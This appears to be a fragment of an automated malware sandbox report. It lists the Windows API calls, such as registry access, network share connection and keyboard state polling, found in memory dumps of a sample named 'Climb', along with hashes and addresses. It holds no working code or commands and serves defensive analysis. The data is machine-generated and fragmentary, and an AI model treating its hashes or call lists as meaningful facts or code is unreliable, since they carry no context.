                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                          • Opcode ID: 54a182f3a492848346cf9a4e95c363596937f9befee3e5c6ee75172aa1e0837c
                                                                                                                                                                          • Instruction ID: 42c09eb919bae1e9964265a334660ca38d6ffd8dfd2889c73eee15e9f7db9899
                                                                                                                                                                          • Opcode Fuzzy Hash: 54a182f3a492848346cf9a4e95c363596937f9befee3e5c6ee75172aa1e0837c
                                                                                                                                                                          • Instruction Fuzzy Hash: B7415F7290021DAACB05FBE0DE46EEEB778AF18704F104165F505B61A2EF356F49CB61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A
                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AC1093
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AC10AF
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AC10CB
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AC10F5
                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AC111D
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC1128
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AC112D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                          • Opcode ID: 88690c34cb9f6ac1b34a41e9bcdfa900cbd05b8171d45f05fb998e010bf9b48b
                                                                                                                                                                          • Instruction ID: 757bf13a60cbdfec62ef1a2a5326d11a9738eeb38a63e79f59f326ccfc731523
                                                                                                                                                                          • Opcode Fuzzy Hash: 88690c34cb9f6ac1b34a41e9bcdfa900cbd05b8171d45f05fb998e010bf9b48b
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D410A72D10129EBCF22EBA4DC45DEEB7B8FF08740F054169E901A3161EB359E45CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AF4AD9
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00AF4AE0
                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AF4AF3
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00AF4AFB
                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AF4B06
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00AF4B10
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00AF4B1A
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00AF4B30
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00AF4B3C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                          • Opcode ID: d102068538d76c04234e222747f1293d029574c1f01f257aa6eee26501d13a0d
                                                                                                                                                                          • Instruction ID: dbc7c02122eb08a0d20303acbda19711973b0469c193fdd38fb702b0cf66c9b3
                                                                                                                                                                          • Opcode Fuzzy Hash: d102068538d76c04234e222747f1293d029574c1f01f257aa6eee26501d13a0d
                                                                                                                                                                          • Instruction Fuzzy Hash: E6311832100219ABDF229FE4DC09FEA3BAAFF0D364F110211FA55A61A0C775D861DB94
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00AE46B9
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00AE46E7
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00AE46F1
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AE478A
                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00AE480E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00AE4932
                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00AE496B
                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,00B00B64,?), ref: 00AE498A
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00AE499D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A21
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AE4A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                          • Opcode ID: 9cf17f23936112211f48ed4beca9e24147adc287bf236974a1636788ee0e9f82
                                                                                                                                                                          • Instruction ID: 2d565279c2afd8d454459411a9705364b4180a7c0b8c8462e995525975aa4b21
                                                                                                                                                                          • Opcode Fuzzy Hash: 9cf17f23936112211f48ed4beca9e24147adc287bf236974a1636788ee0e9f82
                                                                                                                                                                          • Instruction Fuzzy Hash: 52C146716083459FD700DF69C88492BBBE9FF89748F00495DF98A9B251DB31ED06CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00AD8538
                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AD85D4
                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00AD85E8
                                                                                                                                                                          • CoCreateInstance.OLE32(00B00CD4,00000000,00000001,00B27E8C,?), ref: 00AD8634
                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AD86B9
                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00AD8711
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00AD879C
                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AD87BF
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00AD87C6
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00AD881B
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00AD8821
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                          • Opcode ID: 8ea09552359827eb9f4f6221ce9fb7e7985db18c5fd19dce6e87422e104e5ffc
                                                                                                                                                                          • Instruction ID: 7a0a8c3e018122b04a4283f48eed335506ce00b219495b6cb63cf8c84a2ad190
                                                                                                                                                                          • Opcode Fuzzy Hash: 8ea09552359827eb9f4f6221ce9fb7e7985db18c5fd19dce6e87422e104e5ffc
                                                                                                                                                                          • Instruction Fuzzy Hash: 09C12B75A00105AFCB14DFA4C888DAEBBF9FF48344B148599E41ADB361DB34ED42CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AC039F
                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00AC03F8
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00AC040A
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00AC042A
                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00AC047D
                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00AC0491
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AC04A6
                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00AC04B3
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AC04BC
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AC04CE
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AC04D9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                          • Opcode ID: 8033b0cc57280645e7dff815900262e1e8244a472e7353b6b5bd4e79eb73b77f
                                                                                                                                                                          • Instruction ID: 7233823a42f1f878c643c2e153966b10f22d4fb1145f64b814d9a7ac5203be9b
                                                                                                                                                                          • Opcode Fuzzy Hash: 8033b0cc57280645e7dff815900262e1e8244a472e7353b6b5bd4e79eb73b77f
                                                                                                                                                                          • Instruction Fuzzy Hash: C3418435A00219DFCB15DFA8D944EAE7BB9FF08345F018429E955AB261C730A946CF90
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00ACA65D
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00ACA6DE
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00ACA6F9
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00ACA713
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00ACA728
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00ACA740
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00ACA752
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00ACA76A
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 00ACA77C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00ACA794
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00ACA7A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: d022fd382e5a6c726918c5a6e798e4e1bbf6b0aac0b83e83059a45f6220003da
                                                                                                                                                                          • Instruction ID: cb38adc3add5334c18c1bf0164310c4a855fed083c91463adf002efadc400685
                                                                                                                                                                          • Opcode Fuzzy Hash: d022fd382e5a6c726918c5a6e798e4e1bbf6b0aac0b83e83059a45f6220003da
                                                                                                                                                                          • Instruction Fuzzy Hash: AA41B0645047CD69FF3197A48904BB5BEB17B3130CF0A805DD5C69A2C2EBA499C8C7A3
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                          • Opcode ID: b95e8b8514199d709c1bc48449697cc0e171d9dda131aa2cc41961bd05a6f47f
                                                                                                                                                                          • Instruction ID: 70504df440cadbfb9dfd69352e211f30718982b0205e6fe58b54e9444f3cb433
                                                                                                                                                                          • Opcode Fuzzy Hash: b95e8b8514199d709c1bc48449697cc0e171d9dda131aa2cc41961bd05a6f47f
                                                                                                                                                                          • Instruction Fuzzy Hash: B651E432A006569BCF14EFAEC9509BFB7F5BF25360B204229E826E7291DB31DD40C790
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32 ref: 00AE41D1
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00AE41DC
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00B00B44,?), ref: 00AE4236
                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 00AE42A9
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00AE4341
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00AE4393
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                          • Opcode ID: e24e6bb2b6969ea7a39ea45f0cd747f0acadb54a4b90695db38c0319a6388103
                                                                                                                                                                          • Instruction ID: 946b49241e4ba525a43a9ad74f55438d372b341005f3180ac8b6781a7afb1932
                                                                                                                                                                          • Opcode Fuzzy Hash: e24e6bb2b6969ea7a39ea45f0cd747f0acadb54a4b90695db38c0319a6388103
                                                                                                                                                                          • Instruction Fuzzy Hash: DB61BD71608341EFC310DFA5D988FAEBBE8AF49714F004949F9859B2A1CB70ED44CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00AD8C9C
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00AD8CAC
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AD8CB8
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD8D55
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8D69
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8D9B
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AD8DD1
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8DDA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                          • Opcode ID: bdbed8feee284eda7c435d2edb66608682f6234634dad8a0204324399a2b2644
                                                                                                                                                                          • Instruction ID: d0fa9fcc6ac89f6a96da4775a8d4df21ab12890391631260ba4693c1dca9d079
                                                                                                                                                                          • Opcode Fuzzy Hash: bdbed8feee284eda7c435d2edb66608682f6234634dad8a0204324399a2b2644
                                                                                                                                                                          • Instruction Fuzzy Hash: FF617B765043059FCB10EF64C944AAEB3F9FF89310F04491EF99A87291EB35E945CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMenu.USER32 ref: 00AF4715
                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00AF4724
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF47AC
                                                                                                                                                                          • IsMenu.USER32(?), ref: 00AF47C0
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 00AF47CA
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF47F7
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 00AF47FF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                          • Opcode ID: c5ac7e204afcbf4b0b2d7d9a5171fac9299f74419f88e1c6e39c25bd0496fa2e
                                                                                                                                                                          • Instruction ID: 444c9dea9b72e716a103e144cb55848e11eceac44d7c4576b13cdee7d05dadbc
                                                                                                                                                                          • Opcode Fuzzy Hash: c5ac7e204afcbf4b0b2d7d9a5171fac9299f74419f88e1c6e39c25bd0496fa2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F415775A01209EFDB24DFA8D888EBA7BB6FF49354F144028FA45A7360D770A915CB90
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00AC28B1
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 00AC28BC
                                                                                                                                                                          • GetParent.USER32 ref: 00AC28D8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC28DB
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00AC28E4
                                                                                                                                                                          • GetParent.USER32(?), ref: 00AC28F8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC28FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: 4fe8eb2d6de36c1be041f952b27399afaad95975efa2a9c706eb292942988330
                                                                                                                                                                          • Instruction ID: 835b61c1dc64087c7a672b7d85a773afdecb96305d12fe72c1a4f3c1a58eb56c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4fe8eb2d6de36c1be041f952b27399afaad95975efa2a9c706eb292942988330
                                                                                                                                                                          • Instruction Fuzzy Hash: 0221BE74A00118BBCF01EFE0CC85EFEBBB9EF09310F00015AB961A72A1DB354849DB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                            • Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00AC2990
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 00AC299B
                                                                                                                                                                          • GetParent.USER32 ref: 00AC29B7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC29BA
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00AC29C3
                                                                                                                                                                          • GetParent.USER32(?), ref: 00AC29D7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00AC29DA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
